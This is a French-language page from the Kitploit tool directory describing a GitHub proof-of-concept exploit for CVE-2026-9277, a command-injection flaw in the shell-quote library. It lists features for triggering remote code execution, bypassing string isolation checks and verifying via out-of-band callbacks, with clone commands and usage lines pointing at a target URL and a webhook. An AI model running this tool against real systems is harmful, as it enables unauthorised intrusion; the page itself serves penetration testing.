Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-9277 — Preuve de concept pour CVE-2026-9277, une vulnérabilité d'injection de commandes dans la bibliothèque shell-quote. Effectue un parcours JSON récursif avec mutation combinatoire pour déclencher une exécution de code à distance (RCE), prenant en charge la vérification OOB et une journalisation sans bruit. | Kitploit
Outils/GitHubGitHub/dylanzahedi/cve-2026-9277
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubdylanzahedi/cve-2026-9277

CVE-2026-9277

Voir le dépôt
21il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Preuve de concept pour CVE-2026-9277, une vulnérabilité d'injection de commandes dans la bibliothèque shell-quote. Effectue un parcours JSON récursif avec mutation combinatoire pour déclencher une exécution de code à distance (RCE), prenant en charge la vérification OOB et une journalisation sans bruit.

Partager

CVE-2026-9277 - Exploit d'injection de commandes Shell-Quote

Un script d'exploit Proof of Concept (PoC) spécialisé conçu pour vérifier et démontrer CVE-2026-9277 — une vulnérabilité structurelle d'injection de commandes trouvée dans les versions obsolètes de la bibliothèque shell-quote (<= 1.8.3).

Le scanner effectue une manipulation structurelle approfondie sur les charges utiles JSON en entrée pour exposer des vecteurs d'exécution de code à distance (RCE) via un parcours récursif, empêchant les faux positifs à l'aide d'un moteur de temporisation de base réseau dynamique.


Fonctionnalités clés

  • Parcours JSON récursif : Détecte et mute automatiquement les tableaux cibles cachés dans des structures JSON imbriquées à plusieurs niveaux ou des configurations de type GraphQL.
  • Matrice de mutation combinatoire : Teste des scénarios avancés de manipulation de tableaux, y compris les insertions d'index spécifiques, les remplacements absolus de listes et les paires de tableaux dispersés.
  • Architecture OOB automatisée : Gère les dispositions d'exécution Out-of-Band avancées en séparant les composants {"op": "..."} des arguments pour contourner avec succès les contrôles d'isolement des chaînes.
  • Journalisation sans bruit : Moteur d'exécution silencieux qui filtre les réponses de serveur interne 500 cassées/non exploitables, ne faisant apparaître que des preuves vérifiées exclusivement.

Installation et configuration

Assurez-vous d'avoir Python 3.10+ et les paquets requis installés :

root@kitploit:~
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3

Exemples d'exécution

Exemple 1 : Scan local avec fuite de sortie

root@kitploit:~
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'

Exemple 2 : Test Out-of-Band (OOB) avec structure de dictionnaire imbriqué

root@kitploit:~
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"


CVE-2026-9277
Télécharger l’outil